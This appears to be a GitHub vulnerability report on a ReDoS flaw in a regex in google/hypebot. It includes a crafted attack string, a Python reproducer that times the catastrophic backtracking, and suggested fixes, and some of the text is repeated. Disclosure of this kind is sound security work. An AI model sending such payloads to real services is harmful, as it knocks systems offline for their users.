The ReDOS vulnerability can be exploited with the following string
$(!!:"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":""!
You can execute the following code to reproduce ReDos
import re
from time import perf_counter
REGEX = re.compile('\$\(([^\(\)]+(?:[^\(\)]*".*?"[^\(\)]*)*)\)')
ATTACK = '$(!!:"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":""!'
LEN = len(ATTACK)
BEGIN = perf_counter()
print(REGEX.search(ATTACK))
DURATION = perf_counter() - BEGIN
print(f"{LEN}: took {DURATION} seconds!")
I think you can limit the input length or modify this regex.
Type of Issue Potential Regex Denial of Service (ReDoS)
Description The vulnerable regular expression is located in
https://github.com/google/hypebot/blob/dd500026438af2d1154c26ba0201fa22e4c3280e/hypebot/basebot.py#L248
The ReDOS vulnerability can be exploited with the following string
$(!!:"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":""!
You can execute the following code to reproduce ReDos
I think you can limit the input length or modify this regex.